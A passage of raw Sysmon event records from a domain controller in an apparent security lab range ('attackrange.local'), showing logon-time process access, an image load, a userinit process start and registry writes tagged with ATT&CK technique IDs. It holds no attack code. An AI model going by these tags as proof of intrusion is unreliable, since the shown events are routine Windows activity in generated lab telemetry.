:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000009939Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localT1060,RunKeySetValue2021-01-14 13:29:55.998{08A6967A-4753-6000-1505-000000009A01}3792C:\Windows\system32\userinit.exeHKU\S-1-5-21-2738482597-1131698221-3520544381-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Runonce\ctfmon.exectfmon.exe /n 10341000x80000000000000009938Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.998{08A6967A-4288-6000-1000-000000009A01}11362164C:\Windows\system32\svchost.exe{08A6967A-4753-6000-1505-000000009A01}3792C:\Windows\system32\userinit.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009937Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.998{08A6967A-4288-6000-1000-000000009A01}11361600C:\Windows\system32\svchost.exe{08A6967A-4753-6000-1505-000000009A01}3792C:\Windows\system32\userinit.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000009936Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localT1031,T1050SetValue2021-01-14 13:29:55.967{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\EFS\StartDWORD (0x00000003) 10341000x80000000000000009935Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.951{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009934Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.951{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009933Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.951{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009932Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.951{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009931Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.951{08A6967A-4750-6000-0205-000000009A01}47883780C:\Windows\system32\csrss.exe{08A6967A-4753-6000-1505-000000009A01}3792C:\Windows\system32\userinit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009930Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.951{08A6967A-4750-6000-0305-000000009A01}50724500C:\Windows\system32\winlogon.exe{08A6967A-4753-6000-1505-000000009A01}3792C:\Windows\system32\userinit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\winlogon.exe+15b13|C:\Windows\system32\winlogon.exe+ea76|C:\Windows\system32\winlogon.exe+b12f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009929Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.952{08A6967A-4753-6000-1505-000000009A01}3792C:\Windows\System32\userinit.exe10.0.14393.0 (rs1_release.160715-1616)Userinit Logon ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationUSERINIT.EXEC:\Windows\system32\userinit.exeC:\Windows\system32\ATTACKRANGE\Administrator{08A6967A-4752-6000-9133-2D0000000000}0x2d33912HighMD5=C1B1FFC800BE2F31EB2CF8CB40629C69,SHA256=CFC6A18FC8FE7447ECD491345A32F0F10208F114B70A0E9D1CD72F6070D5B36F,IMPHASH=BFA137B16F3492AFCA0551687B067C04{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\System32\winlogon.exewinlogon.exe 10341000x80000000000000009928Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.935{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x80000000000000009927Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.404{08A6967A-4753-6000-0A05-000000009A01}4712C:\Windows\System32\efsui.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x80000000000000009926Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.732{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009925Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.717{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009924Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.717{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009923Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.717{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009922Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.717{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+3a1a|c:\windows\system32\SYSNTFY.dll+1e8d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+52568|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009921Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.717{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009920Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.717{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009919Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.717{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009918Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.717{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009917Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.717{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009916Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.717{08A6967A-4288-6000-1000-000000009A01}11362824C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\sessenv.dll+3de88|c:\windows\system32\sessenv.dll+f881|c:\windows\system32\sessenv.dll+677c|c:\windows\system32\SYSNTFY.dll+1e8d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+52568|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009915Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.638{08A6967A-4753-6000-1305-000000009A01}19484248C:\Windows\system32\conhost.exe{08A6967A-4753-6000-1005-000000009A01}1644C:\Windows\System32\XblGameSaveTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009914Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.623{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4753-6000-0C05-000000009A01}1120C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009913Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.607{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009912Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.607{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009911Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.607{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009910Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 